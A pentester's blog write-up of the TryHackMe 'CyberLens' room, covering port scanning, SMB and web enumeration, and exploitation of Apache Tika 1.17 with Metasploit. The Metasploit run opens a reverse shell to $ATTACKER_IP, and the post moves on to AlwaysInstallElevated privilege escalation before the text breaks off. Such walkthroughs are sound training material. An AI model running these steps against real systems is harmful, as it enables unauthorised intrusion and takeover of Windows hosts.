<!doctype html>














<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" >
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.3.4" />
<meta property="og:title" content="CyberLens" />
<meta name="author" content="Anas" />
<meta property="og:locale" content="en" />
<meta name="description" content="Can you exploit the CyberLens web server and discover the hidden flags?" />
<meta property="og:description" content="Can you exploit the CyberLens web server and discover the hidden flags?" />
<link rel="canonical" href="http://localhost:4000/posts/thm-cyberlens/" />
<meta property="og:url" content="http://localhost:4000/posts/thm-cyberlens/" />
<meta property="og:site_name" content="NullBrunk" />
<meta property="og:image" content="http://localhost:4000/assets/img/writeups/thm/cyberlens/cyberlens_main.svg" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2024-12-26T16:00:00+00:00" />
<meta name="twitter:card" content="summary_large_image" />
<meta property="twitter:image" content="http://localhost:4000/assets/img/writeups/thm/cyberlens/cyberlens_main.svg" />
<meta property="twitter:title" content="CyberLens" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Anas","url":"https://github.com/NullBrunk/"},"dateModified":"2024-12-30T19:38:20+00:00","datePublished":"2024-12-26T16:00:00+00:00","description":"Can you exploit the CyberLens web server and discover the hidden flags?","headline":"CyberLens","image":"http://localhost:4000/assets/img/writeups/thm/cyberlens/cyberlens_main.svg","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/posts/thm-cyberlens/"},"url":"http://localhost:4000/posts/thm-cyberlens/"}</script>
<!-- End Jekyll SEO tag -->


  <title>CyberLens | NullBrunk
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="NullBrunk">
<meta name="application-name" content="NullBrunk">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  <!-- Resource Hints -->
  
    
      
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
    
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
    
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
    
  

  <!-- Bootstrap -->
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css">
  

  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.7.1/css/all.min.css">

  <!-- 3rd-party Dependencies -->

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.32.2/dist/tocbot.min.css">
  

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  

  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  

  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->



<!-- layout specified -->


  

  
    <!-- image lazy-loading & popup & clipboard -->
    
  















  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  



  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.13/dayjs.min.js,npm/dayjs@1.11.13/locale/en.js,npm/dayjs@1.11.13/plugin/relativeTime.js,npm/dayjs@1.11.13/plugin/localizedFormat.js,npm/tocbot@4.32.2/dist/tocbot.min.js"></script>







<script defer src="/assets/js/dist/post.min.js"></script>



<!-- Pageviews -->

  

  



  

  <!-- A placeholder to allow defining custom metadata -->

</head>


  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/img/favicons/logo.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">NullBrunk</a>
    <p class="site-subtitle fst-italic mb-0">Pentester, Developer</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
          
          <li class="nav-item">
            <a href="/tools/" class="nav-link">
              <i class="fa-fw fas fas fa-code"></i>
              

              <span>TOOLS</span>
            </a>
          </li>
        
        <!-- .nav-item -->
      
          
          <li class="nav-item">
            <a href="/prog/" class="nav-link">
              <i class="fa-fw fas fa-screwdriver-wrench"></i>
              

              <span>PROG</span>
            </a>
          </li>
        
        <!-- .nav-item -->
      
          
          <li class="nav-item">
            <a href="/tags/" class="nav-link">
              <i class="fa-fw fas fa-tags"></i>
              

              <span>TAGS</span>
            </a>
          </li>
        
        <!-- .nav-item -->
      
          
          <li class="nav-item">
            <a href="/about/" class="nav-link">
              <i class="fa-fw fas fa-info-circle"></i>
              

              <span>ABOUT</span>
            </a>
          </li>
        
        <!-- .nav-item -->
      
        
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    
      <button type="button" class="btn btn-link nav-link" aria-label="Switch Mode" id="mode-toggle">
        <i class="fas fa-adjust"></i>
      </button>

      
        <span class="icon-border"></span>
      
    

    
      

      
        <a
          href="https://github.com/nullbrunk"
          aria-label="github"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-github"></i>
        </a>
      
    
      

      
        <a
          href="https://www.root-me.org/NullBrunk?q=%2FNullbrunk"
          aria-label="root-me"
          

          

          

          
        >
          <i class="fas fa-skull"></i>
        </a>
      
    
      

      
        <a
          href="https://tryhackme.com/r/p/NullBrunk"
          aria-label="try-hack-me"
          

          

          

          
        >
          <i class="fas fa-cloud"></i>
        </a>
      
    
      

      
        <a
          href="https://www.linkedin.com/in/anas-idiri-b05733229"
          aria-label="linkedin"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-linkedin"></i>
        </a>
      
    
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!--  include topbar.html lang=lang -->

        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->



<!-- Handle images -->




  
  

  
    
      
      
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  

  


<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  

  
  

  

  
  

  




<!-- return -->










<header id="topbar-wrapper" aria-label="Top Bar">
    <div id="topbar" class="d-flex align-items-center justify-content-between h-100" >
        <nav id="breadcrumb" aria-label="Breadcrumb">
            <span><a href="/">Home</a></span>
             

            
                <span>
                 <a href="/categories/writeups/">Writeups</a>
                </span>
            
                <span>
                 <a href="/categories/tryhackme/">TryHackMe</a>
                </span>
            

             
             
            

            
             
            
            <span>CyberLens</span>
        </nav>
    </div>
</header>

<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>CyberLens</h1>
    
      <p class="post-desc fw-light mb-4">Can you exploit the CyberLens web server and discover the hidden flags?</p>
    

    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1735228800"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Dec 26, 2024
</time>

      </span>

      <!-- lastmod date -->
      
        <span>
          Updated
          <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1735587500"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Dec 30, 2024
</time>

        </span>
      

      
        
        
        

        

        <div class="mt-3 mb-3">
          <a href="/assets/img/writeups/thm/cyberlens/cyberlens_main.svg" class="popup img-link preview-img shimmer"><img src="/assets/img/writeups/thm/cyberlens/cyberlens_main.svg"  alt="Preview Image" width="1200" height="630"  loading="lazy"></a></div>
      

      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          

          By

          <em>
            
              
                <a href="https://github.com/NullBrunk/">Anas</a>
                
              
            
          </em>
        </span>

        <div>
          <!-- pageviews -->
          

          <!-- read time -->
          <!-- Calculate the post's reading time, and display the word count in tooltip -->



<!-- words per minute -->










<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="805 words"
>
  <em>4 min</em> read</span>

        </div>
      </div>
    </div>
  </header>

  
    <div id="toc-bar" class="d-flex align-items-center justify-content-between invisible">
      <span class="label text-truncate">CyberLens</span>
      <button type="button" class="toc-trigger btn me-1">
        <i class="fa-solid fa-list-ul fa-fw"></i>
      </button>
    </div>

    <button id="toc-solo-trigger" type="button" class="toc-trigger btn btn-outline-secondary btn-sm">
      <span class="label ps-2 pe-1">Contents</span>
      <i class="fa-solid fa-angle-right fa-fw"></i>
    </button>

    <dialog id="toc-popup" class="p-0">
      <div class="header d-flex flex-row align-items-center justify-content-between">
        <div class="label text-truncate py-2 ms-4">CyberLens</div>
        <button id="toc-popup-close" type="button" class="btn mx-1 my-1 opacity-75">
          <i class="fas fa-close"></i>
        </button>
      </div>
      <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
    </dialog>
  

  <div class="content">
    <h1 id="introduction">Introduction</h1>
<p>Hello everyone, today we will be taking a look at <a href="https://tryhackme.com/r/room/cyberlensp6">Cyberlens</a>, an <span class="easy">Easy</span> rated room on <a href="https://tryhackme.com/">TryHackMe</a>. We will explore the exploitation of a vulnerable Windows server, before moving on to the privilege escalation phase using the Metasploit framework. Let’s get started !</p>

<ol>
  <li>Enumeration
    <ul>
      <li><a href="#portscan">Portscan</a></li>
      <li><a href="#smb-139-445">SMB (139,445)</a></li>
      <li><a href="#http-80">HTTP (80)</a></li>
      <li><a href="#http-61777">HTTP (61777)</a></li>
    </ul>
  </li>
  <li>Exploitation
    <ul>
      <li><a href="#metasploit">Exploiting with metasploit</a></li>
    </ul>
  </li>
  <li>Privesc
    <ul>
      <li><a href="#metasploit-1">Privesc with metasploit</a></li>
    </ul>
  </li>
</ol>

<hr />

<p><br /></p>

<h1 id="enumeration">Enumeration</h1>

<h2 id="portscan"><span class="me-2">Portscan</span><a href="#portscan" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>As always, I like to begin with a basic <a href="https://github.com/RustScan/RustScan">rustscan</a> port scan, followed by an nmap scan with identification of services version, and output the result to a file named <code class="language-plaintext highlighter-rouge">all_ports</code>.</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>rustscan <span class="nt">-a</span> <span class="nv">$TARGET_IP</span> <span class="nt">--</span> <span class="nt">-sV</span> <span class="nt">-oN</span> all_ports
</pre></td></tr></tbody></table></code></div></div>
<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre></td><td class="rouge-code"><pre>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~]
└─<span class="nv">$ </span><span class="nb">cat </span>all_ports
PORT        STATE SERVICE       REASON  VERSION
80/tcp      open  http          syn-ack Apache httpd 2.4.57 <span class="o">((</span>Win64<span class="o">))</span>
135/tcp     open  msrpc         syn-ack Microsoft Windows RPC
139/tcp     open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
445/tcp     open  microsoft-ds? syn-ack 
3389/tcp    open  mw-wbt-server syn-ack Microsoft Terminal Services
5985/tcp    open  http          syn-ack Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span>
7680/tcp    open  panda-pub?    syn-ack 
47001/tcp   open  http          syn-ack Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span>
<span class="nt">---------</span> lot of MSRPC opened ports, not of interest 
61777/tcp   open  http          syn-ack Jetty 8.y.z-SNAPSHOT
Service Info: OS: Windows<span class="p">;</span> CPE: cpe:/o:microsoft:windows 
</pre></td></tr></tbody></table></code></div></div>

<p><strong>What do we learn from this portscan ?</strong></p>
<ul>
  <li>The target is a Windows Server</li>
  <li>There are 4 HTTP servers, as well as SMB and RDP running</li>
</ul>

<h2 id="smb-139-445"><span class="me-2">SMB (139, 445)</span><a href="#smb-139-445" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>I like to start by enumerating SMB because it’s relatively quick, and we always find juicy files. I’ll use <a href="https://www.kali.org/tools/samba/#smbclient">smbclient</a>:</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~]
└─<span class="nv">$ </span>smbclient <span class="nt">-L</span> <span class="s2">"//</span><span class="nv">$TARGET_IP</span><span class="s2">/"</span> <span class="nt">-U</span> <span class="s2">"%"</span>
session setup failed: NT_STATUS_ACCESS_DENIED
</pre></td></tr></tbody></table></code></div></div>
<p>Unfortunately, nothing interesting came up.</p>

<h2 id="http-80"><span class="me-2">HTTP (80)</span><a href="#http-80" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p><a href="/assets/img/writeups/thm/cyberlens/interesting_page.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/cyberlens/interesting_page.png" alt="http"  loading="lazy"></a></p>

<p>The main functionality of this server is to provide image metadata extraction. However, pressing <code class="language-plaintext highlighter-rouge">Ctrl + U</code> revealed no form in the HTML source code:</p>
<div class="language-html highlighter-rouge"><div class="code-header">
        <span data-label-text="HTML"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td><td class="rouge-code"><pre><span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"detail-box"</span><span class="nt">&gt;</span>
    <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"heading_container"</span><span class="nt">&gt;</span>
            <span class="nt">&lt;h2&gt;</span>CyberLens Image Extractor<span class="nt">&lt;/h2&gt;</span>
        <span class="nt">&lt;/div&gt;</span>
        <span class="nt">&lt;p&gt;</span> <span class="c">&lt;!-- Uninteresting text ... --&gt;</span> <span class="nt">&lt;/p&gt;</span>
        <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"file"</span> <span class="na">id=</span><span class="s">"imageFileInput"</span><span class="nt">&gt;</span>
        <span class="nt">&lt;button</span> <span class="na">id=</span><span class="s">"metadataButton"</span><span class="nt">&gt;</span>Get Metadata<span class="nt">&lt;/button&gt;</span>
    <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"metadataOutput"</span><span class="nt">&gt;&lt;/div&gt;</span>
<span class="nt">&lt;/div&gt;</span>
</pre></td></tr></tbody></table></code></div></div>
<p>That means that the metadata extraction functionality is likely to be handled by <code class="language-plaintext highlighter-rouge">JavaScript</code>. Scrolling further in the HTML source code, I found the following JavaScript code, <strong>where I removed irrelevant part</strong>:</p>

<div class="language-javascript highlighter-rouge"><div class="code-header">
        <span data-label-text="JavaScript"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre></td><td class="rouge-code"><pre><span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">metadataButton</span><span class="dl">"</span><span class="p">).</span><span class="nf">addEventListener</span><span class="p">(</span><span class="dl">"</span><span class="s2">click</span><span class="dl">"</span><span class="p">,</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
    <span class="kd">var</span> <span class="nx">fileInput</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">imageFileInput</span><span class="dl">"</span><span class="p">);</span>
    <span class="kd">var</span> <span class="nx">reader</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">FileReader</span><span class="p">();</span>
    <span class="kd">var</span> <span class="nx">fileData</span> <span class="o">=</span> <span class="nx">reader</span><span class="p">.</span><span class="nx">result</span><span class="p">;</span>

    <span class="nf">fetch</span><span class="p">(</span><span class="dl">"</span><span class="s2">http://cyberlens.thm:61777/meta</span><span class="dl">"</span><span class="p">,</span> <span class="p">{</span>
        <span class="na">method</span><span class="p">:</span> <span class="dl">"</span><span class="s2">PUT</span><span class="dl">"</span><span class="p">,</span>
        <span class="na">body</span><span class="p">:</span> <span class="nx">fileData</span><span class="p">,</span>
        <span class="na">headers</span><span class="p">:</span> <span class="p">{</span>
            <span class="dl">"</span><span class="s2">Accept</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">application/json</span><span class="dl">"</span><span class="p">,</span>
            <span class="dl">"</span><span class="s2">Content-Type</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">application/octet-stream</span><span class="dl">"</span>
        <span class="p">}</span>
    <span class="p">})</span>
<span class="p">}</span>
</pre></td></tr></tbody></table></code></div></div>
<p>As you can see, the JavaScript sends the file we uploaded on port <code class="language-plaintext highlighter-rouge">61777</code>. So the service responsible for the metadata handling is effectively running on port <code class="language-plaintext highlighter-rouge">61777</code>.</p>

<h2 id="http-61777"><span class="me-2">HTTP (61777)</span><a href="#http-61777" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p><a href="/assets/img/writeups/thm/cyberlens/tika.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/cyberlens/tika.png" alt="tika"  loading="lazy"></a>
<em>This seems to be a version disclosure</em></p>

<p>Let’s take advantage of this significant version disclosure by running <a href="https://www.kali.org/tools/exploitdb/">searchsploit</a> on this Tika version:</p>

<p><a href="/assets/img/writeups/thm/cyberlens/searchsploit.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/cyberlens/searchsploit.png" alt="searchsploit"  loading="lazy"></a>
<em>Searchsploit found a Metasploit module that matches the Tika version</em></p>

<h1 id="exploitation">Exploitation</h1>

<h2 id="metasploit"><span class="me-2">Metasploit</span><a href="#metasploit" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>Let’s start by launching <a href="https://www.kali.org/tools/metasploit-framework/">Metasploit</a> and searching for the Tika exploit we identified in the enumeration part.</p>

<p><a href="/assets/img/writeups/thm/cyberlens/metasploit.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/cyberlens/metasploit.png" alt="metasploit"  loading="lazy"></a>
<em>Metasploit exploit module for Tika 1.17</em></p>

<p>After typing <code class="language-plaintext highlighter-rouge">show options</code>, we notice that some parameters need to be configured.</p>
<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td><td class="rouge-code"><pre>msf6 exploit<span class="o">(</span>windows/http/apache_tika_jp2_jscript<span class="o">)</span> <span class="o">&gt;</span> <span class="nb">set </span>RHOSTS <span class="nv">$TARGET_IP</span>
RHOSTS <span class="o">=&gt;</span> <span class="nv">$TARGET_IP</span>
msf6 exploit<span class="o">(</span>windows/http/apache_tika_jp2_jscript<span class="o">)</span> <span class="o">&gt;</span> <span class="nb">set </span>RPORT 61777
RPORT <span class="o">=&gt;</span> 61777
msf6 exploit<span class="o">(</span>windows/http/apache_tika_jp2_jscript<span class="o">)</span> <span class="o">&gt;</span> <span class="nb">set </span>LHOST <span class="nv">$ATTACKER_IP</span>
LHOST <span class="o">=&gt;</span> <span class="nv">$ATTACKER_IP</span>
msf6 exploit<span class="o">(</span>windows/http/apache_tika_jp2_jscript<span class="o">)</span> <span class="o">&gt;</span> run
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Started reverse TCP handler on <span class="nv">$ATTACKER_IP</span>:4444 
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Running automatic check <span class="o">(</span><span class="s2">"set AutoCheck false"</span> to disable<span class="o">)</span>
<span class="o">[</span>+] The target is vulnerable.
</pre></td></tr></tbody></table></code></div></div>

<p>Within a few seconds, we’re greeted with a meterpreter session.</p>

<p><a href="/assets/img/writeups/thm/cyberlens/user.txt.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/cyberlens/user.txt.png" alt="metasploit"  loading="lazy"></a>
<em>And we get our first flag !</em></p>

<h1 id="privesc">Privesc</h1>

<h2 id="metasploit-1"><span class="me-2">Metasploit</span><a href="#metasploit-1" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>Since we are already in Metasploit, using the integrated <code class="language-plaintext highlighter-rouge">post/multi/recon/local_exploit_suggester</code> seems to be a great idea. Let’s start by backgrounding the meterpreter session by pressing <code class="language-plaintext highlighter-rouge">Ctrl + Z</code>, then let’s run the following commands:</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>msf6 <span class="o">&gt;</span> use multi/recon/local_exploit_suggester
msf6 post<span class="o">(</span>multi/recon/local_exploit_suggester<span class="o">)</span> <span class="o">&gt;</span> <span class="nb">set </span>SESSION 1
msf6 post<span class="o">(</span>multi/recon/local_exploit_suggester<span class="o">)</span> <span class="o">&gt;</span> run
</pre></td></tr></tbody></table></code></div></div>

<p>This is essentially a post-exploitation module that automatically tries different methods to identify a way to escalate our privileges. You can read more about it <a href="https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/recon/local_exploit_suggester.md">here</a>.</p>

<p><a href="/assets/img/writeups/thm/cyberlens/privesc_enum.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/cyberlens/privesc_enum.png" alt="privesc_enum"  loading="lazy"></a>
<em>Metasploit’s local_exploit_suggester in action</em></p>

<p>The scan reveals several vulnerabilities, but only one is explicitly marked as “vulnerable” <em>(and not as “appears to be vulnerable”)</em>. You can learn more about the “Always Install Elevated” feature on the <a href="https://learn.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated">Microsoft official doc</a> and read <a href="https://dmcxblue.gitbook.io/red-team-notes/privesc/unquoted-service-path">this ressource</a> for an <em>Attacker perspective</em>.</p>

<blockquote>
  <p>Users with limited privileges can exploit this feature by creating a Windows Installer installation package (MSI) that</p>
  <ul>
    <li>Creates a new local account in the local Administrators group</li>
    <li>Adds their current account to the local Administrators group</li>
    <li>Installs malicious software</li>
    <li>Performs other unauthorized activities<sup id="fnref:footnote"><a href="#fn:footnote" class="footnote" rel="footnote" role="doc-noteref">1</a></sup></li>
  </ul>
</blockquote>

<p>Let’s give it a try !</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
